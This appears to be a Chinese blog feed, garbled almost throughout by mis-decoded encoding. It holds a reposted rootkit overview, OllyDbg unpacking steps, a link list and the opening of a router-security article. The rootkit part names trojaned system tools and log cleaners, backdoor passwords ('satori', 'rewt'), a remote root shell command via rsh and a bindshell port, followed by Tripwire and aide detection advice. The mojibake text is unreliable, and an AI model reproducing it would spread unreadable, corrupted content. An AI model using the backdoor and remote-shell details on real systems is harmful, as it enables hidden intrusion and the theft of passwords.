­            涓昏鍏蟲敞鏌愪釜鏂囦歡鎴栧璞℃槸鍚﹁鏇存敼銆傜粡甯稿寘鎷枃浠跺拰鐩綍鐨勫唴瀹瑰拰灞炴э紝瀹冨湪鍙戠幇琚洿鏀圭殑銆佽瀹夎鏈ㄩ┈鐨勫簲鐢ㄧ▼搴忔柟闈㈢壒鍒湁鏁堛?/span>

 

3錛庝俊鎭鐞?/span>

 

鍏ヤ鏡媯嫻嬬殑鍒嗙被



灝忛粯 2010-04-10 17:24 鍙戣〃璇勮
]]>rootkit緇艱堪zzhttp://m.shnenglu.com/momoxiao/archive/2010/03/22/110298.html灝忛粯灝忛粯Mon, 22 Mar 2010 07:50:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/03/22/110298.htmlhttp://m.shnenglu.com/momoxiao/comments/110298.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/03/22/110298.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/110298.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/110298.html
濂藉浜烘湁涓涓瑙o紝浠栦滑璁や負rootkit鏄敤浣滆幏寰楃郴緇焤oot璁塊棶鏉冮檺鐨勫伐鍏楓傚疄闄呬笂錛宺ootkit鏄敾鍑昏呯敤鏉ラ殣钘忚嚜宸辯殑韙抗鍜屼繚鐣檙oot璁塊棶鏉冮檺鐨勫伐鍏楓傞氬父錛屾敾鍑昏呴氳繃榪滅▼鏀誨嚮鑾峰緱root璁塊棶鏉冮檺錛屾垨鑰呴鍏堝瘑鐮佺寽嫻嬫垨鑰呭瘑鐮佸己鍒剁牬璇戠殑鏂瑰紡鑾峰緱緋葷粺鐨勮闂潈闄愩傝繘鍏ョ郴緇熷悗錛屽鏋滀粬榪樻病鏈夎幏寰梤oot鏉冮檺錛屽啀閫氳繃鏌愪簺瀹夊叏婕忔礊鑾峰緱緋葷粺鐨剅oot鏉冮檺銆傛帴鐫錛屾敾鍑昏呬細鍦ㄤ鏡鍏ョ殑涓繪満涓畨瑁卹ootkit錛岀劧鍚庝粬灝嗙粡甯擱氳繃rootkit鐨勫悗闂ㄦ鏌ョ郴緇熸槸鍚︽湁鍏朵粬鐨勭敤鎴風櫥褰曪紝濡傛灉鍙湁鑷繁錛屾敾鍑昏呭氨寮濮嬬潃鎵嬫竻鐞嗘棩蹇椾腑鐨勬湁鍏充俊鎭傞氳繃rootkit鐨勫梾鎺㈠櫒鑾峰緱鍏跺畠緋葷粺鐨勭敤鎴峰拰瀵嗙爜涔嬪悗錛屾敾鍑昏呭氨浼氬埄鐢ㄨ繖浜涗俊鎭鏡鍏ュ叾瀹冪殑緋葷粺銆?




浠涔堟槸rootkit


Rootkit鍑虹幇浜庝簩鍗佷笘綰?0騫翠唬鍒濓紝鍦?994騫?鏈堢殑涓綃囧畨鍏ㄥ挩璇㈡姤鍛婁腑棣栧厛浣跨敤浜唕ootkit榪欎釜鍚嶈瘝銆傝繖綃囧畨鍏ㄥ挩璇㈠氨鏄疌ERT-CC鐨凜A-1994-01錛岄鐩槸Ongoing Network Monitoring Attacks錛屾渶鏂扮殑淇鏃墮棿鏄?997騫?鏈?9鏃ャ備粠鍑虹幇鑷充粖錛宺ootkit鐨勬妧鏈彂灞曢潪甯歌繀閫燂紝搴旂敤瓚婃潵瓚婂箍娉涳紝媯嫻嬮毦搴︿篃瓚婃潵瓚婂ぇ銆傚叾涓拡瀵筍unOS鍜孡inux涓ょ鎿嶄綔緋葷粺鐨剅ootkit鏈澶?鏍戝ぇ鎷涢:P)銆傛墍鏈夌殑rootkit鍩烘湰涓婇兘鏄敱鍑犱釜鐙珛鐨勭▼搴忕粍鎴愮殑錛屼竴涓吀鍨媟ootkit鍖呮嫭錛?



浠ュお緗?strong>鍡呮帰鍣?/strong>紼嬬▼搴忥紝鐢ㄤ簬鑾峰緱緗戠粶涓婁紶杈撶殑鐢ㄦ埛鍚嶅拰瀵嗙爜絳変俊鎭?


鐗規礇浼?strong>鏈ㄩ┈
紼嬪簭錛屼緥濡傦細inetd鎴栬卨ogin錛屼負鏀誨嚮鑰呮彁渚涘悗闂ㄣ?


闅愯棌鏀誨嚮鑰呯殑鐩綍鍜岃繘紼嬬殑紼嬪簭錛屼緥濡傦細ps銆乶etstat銆乺shd鍜宭s絳夈?


鍙兘榪樺寘鎷竴浜?strong>鏃ュ織娓呯悊宸ュ叿錛屼緥濡傦細zap銆亃ap2鎴栬厇2錛屾敾鍑昏呬嬌鐢ㄨ繖浜涙竻鐞嗗伐鍏峰垹闄tmp銆乽tmp鍜宭astlog絳夋棩蹇楁枃浠朵腑鏈夊叧鑷繁琛岃釜鐨勬潯鐩?


涓浜涘鏉傜殑rootkit榪樺彲浠ュ悜鏀誨嚮鑰呮彁渚泃elnet銆乻hell鍜宖inger絳夋湇鍔°?


榪樺寘鎷竴浜涚敤鏉ユ竻鐞?var/log鍜?var/adm鐩綍涓叾瀹冩枃浠剁殑涓浜涜剼鏈?


鏀誨嚮鑰呬嬌鐢╮ootkit涓殑鐩稿叧紼嬪簭鏇夸唬緋葷粺鍘熸潵鐨刾s銆乴s銆乶etstat鍜宒f絳夌▼搴忥紝浣跨郴緇熺鐞嗗憳鏃犳硶閫氳繃榪欎簺宸ュ叿鍙戠幇鑷繁鐨勮釜榪廣傛帴鐫浣跨敤鏃ュ織娓呯悊宸ュ叿娓呯悊緋葷粺鏃ュ織錛屾秷闄よ嚜宸辯殑韙抗銆傜劧鍚庯紝鏀誨嚮鑰呬細緇忓父鍦伴氳繃瀹夎鐨勫悗闂ㄨ繘鍏ョ郴緇熸煡鐪嬪梾鎺㈠櫒鐨勬棩蹇楋紝浠ュ彂璧峰叾瀹冪殑鏀誨嚮銆傚鏋滄敾鍑昏呰兘澶熸紜湴瀹夎rootkit騫跺悎鐞嗗湴娓呯悊浜嗘棩蹇楁枃浠訛紝緋葷粺綆$悊鍛樺氨浼氬緢闅懼療瑙夌郴緇熷凡緇忚渚靛叆錛岀洿鍒版煇涓澶╁叾瀹冪郴緇熺殑綆$悊鍛樺拰浠栬仈緋繪垨鑰呭梾鎺㈠櫒鐨勬棩蹇楁妸紓佺洏鍏ㄩ儴濉弧錛屼粬鎵嶄細瀵熻宸茬粡澶хジ涓村ご浜嗐備絾鏄紝澶у鏁版敾鍑昏呭湪娓呯悊緋葷粺鏃ュ織鏃朵笉鏄潪甯稿皬蹇冩垨鑰呭共鑴嗘妸緋葷粺鏃ュ織鍏ㄩ儴鍒犻櫎浜嗕簨錛岃瑙夌殑緋葷粺綆$悊鍛樺彲浠ユ牴鎹繖浜涘紓甯告儏鍐靛垽鏂嚭緋葷粺琚鏡鍏ャ備笉榪囷紝鍦ㄧ郴緇熸仮澶嶅拰娓呯悊榪囩▼涓紝澶у鏁板父鐢ㄧ殑鍛戒護渚嬪ps銆乨f鍜宭s宸茬粡涓嶅彲淇′簡銆傝澶歳ootkit涓湁涓涓彨鍋欶IX鐨勭▼搴忥紝鍦ㄥ畨瑁卹ootkit涔嬪墠錛屾敾鍑昏呭彲浠ラ鍏堜嬌鐢ㄨ繖涓▼搴忓仛涓涓郴緇熶簩榪涘埗浠g爜鐨勫揩鐓э紝鐒跺悗鍐嶅畨瑁呮浛浠g▼搴忋侳IX鑳藉鏍規嵁鍘熸潵鐨勭▼搴忎吉閫犳浛浠g▼搴忕殑涓変釜鏃墮棿鎴?atime銆乧time銆乵time)銆乨ate銆乸ermission銆佹墍灞炵敤鎴峰拰鎵灞炵敤鎴風粍銆傚鏋滄敾鍑昏呰兘澶熷噯紜湴浣跨敤榪欎簺浼樼鐨勫簲鐢ㄧ▼搴忥紝騫朵笖鍦ㄥ畨瑁卹ootkit鏃惰涓鴻皚鎱庯紝灝變細璁╃郴緇熺鐞嗗憳寰堥毦鍙戠幇銆?



LINUX ROOTKIT IV


鍓嶉潰璇磋繃錛屽ぇ閮ㄥ垎rootkit鏄拡瀵筁inux鍜孲unOS鐨勶紝涓嬮潰鎴戜滑浠嬬粛涓涓潪甯稿吀鍨嬬殑閽堝Linux緋葷粺鐨剅ootkit--Linux Rootkit IV銆侺inux Rootkit IV鏄竴涓紑鏀炬簮鐮佺殑rootkit錛屾槸Lord Somer緙栧啓鐨勶紝浜?998騫?1鏈堝彂甯冦備笉榪囷紝瀹冧笉鏄涓涓狶inux Rootkit錛屽湪瀹冧箣鍓嶆湁lrk銆乴nrk銆乴rk2鍜宭rk3絳塋inux Rootkit銆傝繖浜況ootkit鍖呮嫭甯哥敤鐨剅ootkit緇勪歡錛屼緥濡傚梾鎺㈠櫒銆佹棩蹇楃紪杈?鍒犻櫎宸ュ叿銆佸拰鍚庨棬紼嬪簭鐨勩?

緇忚繃榪欎箞澶氬勾鐨勫彂灞曪紝Linux Rootkit IV鍔熻兘鍙樼殑瓚婃潵瓚婂畬鍠勶紝鍏鋒湁鐨勭壒寰佷篃瓚婃潵瓚婂銆備笉榪囷紝铏界劧瀹冪殑浠g爜闈炲父搴炲ぇ錛屽嵈闈炲父鏄撲簬瀹夎鍜屼嬌鐢紝鍙鎵цmake install灝卞彲浠ユ垚鍔熷畨瑁呫傚鏋滀綘榪樿瀹夎涓涓猻hadow宸ュ叿錛屽彧瑕佹墽琛宮ake shadow install灝卞彲浠ヤ簡銆傛敞鎰忥細Linux Rootkit IV鍙兘鐢ㄤ簬Linux 2.x鐨勫唴鏍搞備笅闈㈡垜浠畝鍗曞湴浠嬬粛涓涓婰inux Rootkit IV鍖呭惈鐨勫悇縐嶅伐鍏鳳紝璇︾粏鐨勪粙緇嶈鍙傝冨叾鍙戝竷鍖呯殑README鏂囦歡銆?

闅愯棌鍏ヤ鏡鑰呰韙殑紼嬪簭

涓轟簡闅愯棌鍏ヤ鏡鑰呯殑琛岃釜錛孡inux Rootkit IV鐨勪綔鑰呭彲璋撶厼璐瑰績鏈猴紝緙栧啓浜嗚澶氱郴緇熷懡浠ょ殑鏇夸唬紼嬪簭錛屼嬌鐢ㄨ繖浜涚▼搴忎唬鏇垮師鐢辯殑緋葷粺鍛戒護錛屾潵闅愯棌鍏ヤ鏡鑰呯殑琛岃釜銆傝繖浜涚▼搴忓寘鎷細



ls銆乫ind銆乨u

榪欎簺紼嬪簭浼氶樆姝㈡樉紺哄叆渚佃呯殑鏂囦歡浠ュ強璁$畻鍏ヤ鏡鑰呮枃浠跺崰鐢ㄧ殑絀洪棿銆傚湪緙栬瘧涔嬪墠錛屽叆渚佃呭彲浠ラ氳繃ROOTKIT_FILES_FILE璁劇疆鑷繁鐨勬枃浠舵墍澶勭殑浣嶇疆錛岄粯璁ゆ槸/dev/ptyr銆傛敞鎰忓鏋滃湪緙栬瘧鏃朵嬌鐢ㄤ簡SHOWFLAG閫夐」錛屽氨鍙互浣跨敤ls -/鍛戒護鍒楀嚭鎵鏈夌殑鏂囦歡銆傝繖鍑犱釜紼嬪簭榪樿兘澶熻嚜鍔ㄩ殣钘忔墍鏈夊悕瀛椾負錛歱tyr銆乭ack.dir鍜學4r3z鐨勬枃浠躲?


ps銆乼op銆乸idof

榪欏嚑涓▼搴忕敤鏉ラ殣钘忔墍鏈夊拰鍏ヤ鏡鑰呯浉鍏崇殑榪涚▼銆?


netstat

闅愯棌鍑?鍏ユ寚瀹欼P鍦板潃鎴栬呯鍙g殑緗戠粶鏁版嵁嫻侀噺銆?


killall

涓嶄細鏉姝昏鍏ヤ鏡鑰呴殣钘忕殑榪涚▼銆?


ifconfig

濡傛灉鍏ヤ鏡鑰呭惎鍔ㄤ簡鍡呮帰鍣紝榪欎釜紼嬪簭灝遍樆姝ROMISC鏍囪鐨勬樉紺猴紝浣跨郴緇熺鐞嗗憳闅句互鍙戠幇緗戠粶鎺ュ彛宸茬粡澶勪簬娣鋒潅妯″紡涓嬨?


crontab

闅愯棌鏈夊叧鏀誨嚮鑰呯殑crontab鏉$洰銆?


tcpd

闃繪鍚戞棩蹇椾腑璁板綍鏌愪簺榪炴帴


syslogd

榪囨護鎺夋棩蹇椾腑鐨勬煇浜涜繛鎺ヤ俊鎭?



鏈ㄩ┈紼嬪簭

涓烘湰鍦扮敤鎴鋒彁渚涘悗闂紝鍖呮嫭錛?



chfn

鎻愬崌鏈湴鏅氱敤鎴鋒潈闄愮殑紼嬪簭銆傝繍琛宑hfn錛屽湪瀹冩彁紺鴻緭鍏ユ柊鐨勭敤鎴峰悕鏃訛紝濡傛灉鐢ㄦ埛杈撳叆rookit瀵嗙爜錛屼粬鐨勬潈闄愬氨琚彁鍗囦負root銆傞粯璁ょ殑rootkit瀵嗙爜鏄痵atori銆?


chsh

涔熸槸涓涓彁鍗囨湰鍦扮敤鎴鋒潈闄愮殑紼嬪簭銆傝繍琛宑hsh錛屽湪瀹冩彁紺鴻緭鍏ユ柊鐨剆hell鏃訛紝濡傛灉鐢ㄦ埛杈撳叆rootkit瀵嗙爜錛屼粬鐨勬潈闄愬氨琚彁鍗囦負root銆?


passwd

鍜屼笂闈袱涓▼搴忕殑浣滅敤鐩稿悓銆傚湪鎻愮ず浣犺緭鍏ユ柊瀵嗙爜鏃訛紝濡傛灉杈撳叆rookit瀵嗙爜錛屾潈闄愬氨鍙互鍙樻垚root銆?


login

鍏佽浣跨敤浠諱綍甯愭埛閫氳繃rootkit瀵嗙爜鐧誨綍銆傚鏋滀嬌鐢╮oot甯愭埛鐧誨綍琚嫆緇濓紝鍙互灝濊瘯涓涓媟ewt銆傚綋浣跨敤鍚庨棬鏃訛紝榪欎釜紼嬪簭榪樿兘澶熺姝㈣褰曞懡浠ょ殑鍘嗗彶璁板綍銆?


鏈ㄩ┈緗戠粶鐩戞帶紼嬪簭

榪欎簺紼嬪簭涓鴻繙紼嬬敤鎴鋒彁渚涘悗闂紝鍙互鍚戣繙紼嬬敤鎴鋒彁渚沬netd銆乺sh銆乻sh絳夋湇鍔★紝鍏蜂綋鍥犵増鏈屽紓銆傞殢鐫鐗堟湰鐨勫崌綰э紝Linux Rootkit IV鐨勫姛鑳戒篃瓚婃潵瓚婂己澶э紝鐗瑰緛涔熻秺鏉ヨ秺涓板瘜銆備竴鑸寘鎷涓嬬綉緇滄湇鍔$▼搴忥細



inetd

鐗規礇浼奿netd紼嬪簭錛屼負鏀誨嚮鑰呮彁渚涜繙紼嬭闂湇鍔°?


rshd

涓烘敾鍑昏呮彁渚涜繙紼媠hell鏈嶅姟銆傛敾鍑昏呬嬌鐢╮sh -l rootkitpassword host command鍛戒護灝卞彲浠ュ惎鍔ㄤ竴涓繙紼媟oot shell銆?


sshd

涓烘敾鍑昏呮彁渚泂sh鏈嶅姟鐨勫悗闂ㄧ▼搴忋?


宸ュ叿紼嬪簭

鎵鏈変笉灞炰簬浠ヤ笂綾誨瀷鐨勭▼搴忛兘鍙互褰掑榪欎釜綾誨瀷錛屽畠浠疄鐜頒竴浜涜濡傦細鏃ュ織娓呯悊銆佹姤鏂囧梾鎺互鍙婅繙紼媠hell鐨勭鍙g粦瀹氱瓑鍔熻兘錛屽寘鎷細



fix

鏂囦歡灞炴т吉閫犵▼搴?


linsniffer

鎶ユ枃鍡呮帰鍣ㄧ▼搴忋?


sniffchk

涓涓畝鍗曠殑bash shell鑴氭湰錛屾鏌ョ郴緇熶腑鏄惁姝f湁涓涓梾鎺㈠櫒鍦ㄨ繍琛屻?


wted

wtmp/utmp鏃ュ織緙栬緫紼嬪簭銆備綘鍙互浣跨敤榪欎釜宸ュ叿緙栬緫鎵鏈墂tmp鎴栬卽tmp綾誨瀷鐨勬枃浠躲?


z2

utmp/wtmp/lastlog鏃ュ織娓呯悊宸ュ叿銆傚彲浠ュ垹闄tmp/wtmp/lastlog鏃ュ織鏂囦歡涓湁鍏蟲煇涓敤鎴峰悕鐨勬墍鏈夋潯鐩備笉榪囷紝濡傛灉鐢ㄤ簬Linux緋葷粺闇瑕佹墜宸ヤ慨鏀瑰叾婧愪唬鐮侊紝璁劇疆鏃ュ織鏂囦歡鐨勪綅緗?


bindshell

鍦ㄦ煇涓鍙d笂緇戝畾shell鏈嶅姟錛岄粯璁ょ鍙f槸12497銆備負榪滅▼鏀誨嚮鑰呮彁渚泂hell鏈嶅姟銆?




濡備綍鍙戠幇rootkit


寰堟樉鐒訛紝鍙湁浣夸綘鐨勭綉緇滈潪甯稿畨瑁呰鏀誨嚮鑰呮棤闅欏彲涔橈紝鎵嶈兘鏄嚜宸辯殑緗戠粶鍏嶅彈rootkit鐨勫獎鍝嶃備笉榪囷紝鎭愭曟病鏈変漢鑳藉鎻愪緵榪欎釜淇濊瘉錛屼絾鏄湪鏃ュ父鐨勭綉緇滅鐞嗙淮鎶や腑淇濇寔涓浜涜壇濂界殑涔犳儻錛岃兘澶熷湪涓瀹氱▼搴︿笂鍑忓皬鐢眗ootkit閫犳垚鐨勬崯澶憋紝騫跺強鏃跺彂鐜皉ootkit鐨勫瓨鍦ㄣ?

棣栧厛錛屼笉瑕佸湪緗戠粶涓婁嬌鐢ㄦ槑鏂囦紶杈撳瘑鐮侊紝鎴栬呬嬌鐢ㄤ竴嬈℃у瘑鐮併傝繖鏍鳳紝鍗充嬌浣犵殑緋葷粺宸茬粡琚畨瑁呬簡rootkit錛屾敾鍑昏呬篃鏃犳硶閫氳繃緗戠粶鐩戝惉錛岃幏寰楁洿澶氱敤鎴峰悕鍜屽瘑鐮侊紝浠庤岄伩鍏嶅叆渚電殑钄撳歡銆?

浣跨敤Tripwire鍜宎ide絳夋嫻嬪伐鍏瘋兘澶熷強鏃跺湴甯姪浣犲彂鐜版敾鍑昏呯殑鍏ヤ鏡錛屽畠浠兘澶熷緢濂藉湴鎻愪緵緋葷粺瀹屾暣鎬х殑媯鏌ャ傝繖綾誨伐鍏蜂笉鍚屼簬鍏跺畠鐨勫叆渚墊嫻嬪伐鍏鳳紝瀹冧滑涓嶆槸閫氳繃鎵璋撶殑鏀誨嚮鐗瑰緛鐮佹潵媯嫻嬪叆渚佃涓猴紝鑰屾槸鐩戣鍜屾鏌ョ郴緇熷彂鐢熺殑鍙樺寲銆俆ripwire棣栧厛浣跨敤鐗瑰畾鐨勭壒寰佺爜鍑芥暟涓洪渶瑕佺洃瑙嗙殑緋葷粺鏂囦歡鍜岀洰褰曞緩绔嬩竴涓壒寰佹暟鎹簱錛屾墍璋撶壒寰佺爜鍑芥暟灝辨槸浣跨敤浠繪剰鐨勬枃浠朵綔涓鴻緭鍏ワ紝浜х敓涓涓浐瀹氬ぇ灝忕殑鏁版嵁(鐗瑰緛鐮?鐨勫嚱鏁般傚叆渚佃呭鏋滃鏂囦歡榪涜浜嗕慨鏀癸紝鍗充嬌鏂囦歡澶у皬涓嶅彉錛屼篃浼氱牬鍧忔枃浠剁殑鐗瑰緛鐮併傚埄鐢ㄨ繖涓暟鎹簱錛孴ripwire鍙互寰堝鏄撳湴鍙戠幇緋葷粺鐨勫彉鍖栥傝屼笖鏂囦歡鐨勭壒寰佺爜鍑犱箮鏄笉鍙兘浼犵殑錛岀郴緇熺殑浠諱綍鍙樺寲閮介冧笉榪嘥ripwire鐨勭洃瑙?褰撶劧錛屽墠鎻愭槸浣犲凡緇忛拡瀵硅嚜宸辯殑緋葷粺鍋氫簡鍑嗙‘鐨勯厤緗?P錛屽叧浜嶵ripwire鍜宎ide鐨勪嬌鐢ㄨ鍙傝冩湰绔欑殑鐩稿叧鏂囩珷)銆傛渶鍚庯紝闇瑕佽兘澶熸妸榪欎釜鐗瑰緛鐮佹暟鎹簱鏀懼埌瀹夊叏鐨勫湴鏂廣?




鍓嶄竴孌墊椂闂達紝鍐欎簡鍑犵瘒rootkit鍒嗘瀽鏂囩珷錛岃繖綃囨潈涓斾綔涓鴻繖涓緋誨垪鏂囩珷鐨勬葷粨錛屽埌姝や負姝€備絾鏄湪鏈榪戝彂甯冪殑Phrack58-0x07(Linux on-the-fly kernel patching without LKM)涓疄鐜頒竴涓洿鎺ヤ慨鏀瑰唴鏍告暟鎹粨鏋勭殑rootkit錛屽洜姝ゅ喅瀹氬啓涓涓畫綃囥?P<br>


灝忛粯 2010-03-22 15:50 鍙戣〃璇勮
]]>[zz]甯歌鑴卞3鐭ヨ瘑http://m.shnenglu.com/momoxiao/archive/2009/12/14/103195.html灝忛粯灝忛粯Mon, 14 Dec 2009 10:16:00 GMThttp://m.shnenglu.com/momoxiao/archive/2009/12/14/103195.htmlhttp://m.shnenglu.com/momoxiao/comments/103195.htmlhttp://m.shnenglu.com/momoxiao/archive/2009/12/14/103195.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/103195.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/103195.html2.POPAD 錛堝嚭鏍堬級 浠h〃紼嬪簭鐨勫嚭鍙g偣錛屼笌PUSHAD鎯沖搴旓紝涓鑸壘鍒拌繖涓狾EP灝卞湪闄勮繎鎷夛紒
3.OEP錛氱▼搴忕殑鍏ュ彛鐐癸紝杞歡鍔犲3灝辨槸闅愯棌浜哋EP錛堟垨鑰呯敤浜嗗亣鐨凮EP錛夛紝
鍙鎴戜滑鎵懼埌紼嬪簭鐪熸鐨凮EP錛屽氨鍙互绔嬪埢鑴卞3銆?

寮濮嬫寮忎粙緇嶆柟娉曞暒錛侊紒
鏂規硶涓錛?
1.鐢∣D杞藉叆錛屼笉鍒嗘瀽浠g爜錛?
2.鍗曟鍚戜笅璺熻釜F8錛屾槸鍚戜笅璺崇殑璁╁畠瀹炵幇
3.閬囧埌紼嬪簭寰鍥炶煩鐨勶紙鍖呮嫭寰幆錛夛紝鎴戜滑鍦ㄤ笅涓鍙ヤ唬鐮佸鎸塅4錛堟垨鑰呭彸鍋ュ崟鍑諱唬鐮侊紝閫夋嫨鏂偣鈥斺旇繍琛屽埌鎵閫夛級
4.緇胯壊綰挎潯琛ㄧず璺寵漿娌″疄鐜幫紝涓嶇敤鐞嗕細錛岀孩鑹茬嚎鏉¤〃紺鴻煩杞凡緇忓疄鐜幫紒
5.濡傛灉鍒氳澆鍏ョ▼搴忥紝鍦ㄩ檮榪戝氨鏈変竴涓狢ALL鐨勶紝鎴戜滑灝盕7璺熻繘鍘伙紝榪欐牱寰堝揩灝辮兘鍒扮▼搴忕殑OEP
6.鍦ㄨ窡韙殑鏃跺欙紝濡傛灉榪愯鍒版煇涓狢ALL紼嬪簭灝辮繍琛岀殑錛屽氨鍦ㄨ繖涓狢ALL涓璅7榪涘叆
7.涓鑸湁寰堝ぇ鐨勮煩杞紝姣斿 jmp XXXXXX 鎴栬?JE XXXXXX 鎴栬呮湁RETE鐨勪竴鑸緢蹇氨浼氬埌紼嬪簭鐨凮EP銆?

鏂規硶浜岋細
ESP瀹氱悊鑴卞3錛圗SP鍦∣D鐨勫瘎瀛樺櫒涓紝鎴戜滑鍙鍦ㄥ懡浠よ涓婨SP鐨勭‖浠惰闂柇鐐癸紝灝變細涓涓嬫潵鍒扮▼搴忕殑OEP浜嗭紒錛?
1.寮濮嬪氨鐐笷8錛屾敞鎰忚瀵烵D鍙充笂瑙掔殑瀵勫瓨鍣ㄤ腑ESP鏈夋病鍑虹幇銆?
2.鍦ㄥ懡浠よ涓嬶細dd 0012FFA4(鎸囧湪褰撳墠浠g爜涓殑ESP鍦板潃)錛屾寜鍥炶濺錛?
3.閫夌涓嬫柇鐨勫湴鍧錛屼笅紜歡璁塊棶WORD鏂偣銆?
4.鎸変竴涓婩9榪愯紼嬪簭錛岀洿鎺ユ潵鍒頒簡璺寵漿澶勶紝鎸変笅F8錛屽埌杈劇▼搴廜EP錛岃劚澹?

鏂規硶涓夛細
鍐呭瓨璺熻釜錛?
1錛氱敤OD鎵撳紑杞歡錛?
2錛氱偣鍑婚夐」鈥斺旇皟璇曢夐」鈥斺斿紓甯革紝鎶婇噷闈㈢殑蹇界暐鍏ㄩ儴√涓婏紒CTRL+F2閲嶈澆涓嬬▼搴忥紒
3錛氭寜ALT+M,DA 鎵撳紑鍐呭瓨闀滆薄錛屾壘鍒扮涓涓?rsrc.鎸塅2涓嬫柇鐐癸紝
鐒跺悗鎸塖HIFT+F9榪愯鍒版柇鐐癸紝鎺ョ潃鍐嶆寜ALT+M,DA 鎵撳紑鍐呭瓨闀滆薄錛屾壘鍒?RSRC涓婇潰鐨凜ODE錛屾寜
F2涓嬫柇鐐癸紒鐒跺悗鎸塖HIFT+F9錛岀洿鎺ュ埌杈劇▼搴廜EP錛岃劚澹籌紒


鏂規硶鍥涳細
涓姝ュ埌杈綩EP錛堝墠杈堜滑鎬葷粨鐨勭粡楠岋級
1.寮濮嬫寜Ctrl+F,杈撳叆錛歱opad錛堝彧閫傚悎灝戞暟澹籌紝鍖呮嫭ASPACK澹籌級錛岀劧鍚庢寜涓婩2錛孎9榪愯鍒版澶?
2.鏉ュ埌澶ц煩杞錛岀偣涓婩8錛岃劚澹充箣錛?

鏂規硶浜旓細
1錛氱敤OD鎵撳紑杞歡錛?
2錛氱偣鍑婚夐」鈥斺旇皟璇曢夐」鈥斺斿紓甯革紝鎶婇噷闈㈢殑√鍏ㄩ儴鍘繪帀錛丆TRL+F2閲嶈澆涓嬬▼搴忥紒
3錛氫竴寮鏄▼搴忓氨鏄竴涓煩杞紝鍦ㄨ繖閲屾垜浠寜SHIFT+F9錛岀洿鍒扮▼搴忚繍琛岋紝璁頒笅浠庡紑濮嬫寜F9鍒扮▼搴?
榪愯鐨勬鏁幫紒
4錛欳TRL+F2閲嶈澆紼嬪簭錛屾寜SHIFT+F9錛堟鏁頒負紼嬪簭榪愯鐨勬鏁?1嬈?
5錛氬湪OD鐨勫彸涓嬭鎴戜滑鐪嬭鏈変竴涓猄E 鍙ユ焺錛岃繖鏃舵垜浠寜CTRL+G錛岃緭鍏E 鍙ユ焺鍓嶇殑鍦板潃錛?
6錛氭寜F2涓嬫柇鐐癸紒鐒跺悗鎸塖HIFT+F9鏉ュ埌鏂偣澶勶紒
7錛氬幓鎺夋柇鐐癸紝鎸塅8鎱㈡參鍚戜笅璧幫紒
8錛氬埌杈劇▼搴忕殑OEP錛岃劚澹籌紒


灝忛粯 2009-12-14 18:16 鍙戣〃璇勮
]]>
甯哥敤緗戝潃http://m.shnenglu.com/momoxiao/archive/2009/12/12/103034.html灝忛粯灝忛粯Sat, 12 Dec 2009 03:14:00 GMThttp://m.shnenglu.com/momoxiao/archive/2009/12/12/103034.htmlhttp://m.shnenglu.com/momoxiao/comments/103034.htmlhttp://m.shnenglu.com/momoxiao/archive/2009/12/12/103034.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/103034.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/103034.html瑙e瘑鍒嗘瀽
鐪嬮洩--瑙e瘑鍒嗘瀽鍏ラ棬鍩虹鐭ヨ瘑
http://bbs.pediy.com/showthread.php?t=31840


緗戠粶鏀婚槻

鏌ヨWHOIS鏁版嵁搴?/strong>
NIC鐨刉HOIS鏁版嵁搴?
http://www.internic.net/whois.html

 Uwhois
http://www.uwhois.com/

灝忛粯 2009-12-12 11:14 鍙戣〃璇勮
]]>
[zz]緗戠粶璺敱瀹夊叏鏀婚槻瀵圭瓥鍒嗘瀽鍙婂疄璺?/title><link>http://m.shnenglu.com/momoxiao/archive/2009/12/11/103012.html</link><dc:creator>灝忛粯</dc:creator><author>灝忛粯</author><pubDate>Fri, 11 Dec 2009 14:50:00 GMT</pubDate><guid>http://m.shnenglu.com/momoxiao/archive/2009/12/11/103012.html</guid><wfw:comment>http://m.shnenglu.com/momoxiao/comments/103012.html</wfw:comment><comments>http://m.shnenglu.com/momoxiao/archive/2009/12/11/103012.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/momoxiao/comments/commentRss/103012.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/momoxiao/services/trackbacks/103012.html</trackback:ping><description><![CDATA[<p><font face=瀹嬩綋 size=3>緗戠粶璺敱鍣ㄧ殑瀹夊叏闂涓鐩翠互鏉ヨ澶у璋堣寰楁瘮杈冨錛岃櫧鐒舵垜浠湅鍒扮殑璺敱鍣ㄥ叆渚典簨浠朵笉澶氾紝鍥犳鍦ㄥ緢澶氫漢鐨勫嵃璞′腑錛岃礬鐢?Routing)鍙槸閫夋嫨閫氳繃浜掕仈緗戠粶浠庢簮鑺傜偣鍚戠洰鐨勮妭鐐逛紶杈撲俊鎭殑閫氶亾錛屽叾瀹炶礬鐢卞櫒鐨勫畨鍏ㄩ殣鎮e緢澶氾紝鍙槸鐢變簬涓鑸粦瀹㈡帴瑙﹀緱涓嶅お棰戠箒錛岃鏀誨嚮鐨勪簨浠跺緢灝戝彂鐢燂紝浣嗗鏋滆礬鐢卞櫒琚敾鍑伙紝鍚庢灉灝嗕笉鍫鎯熾?</font></p> <p>銆銆<strong>涓嶅彲蹇借鐨勮礬鐢卞櫒瀹夊叏</strong></p> 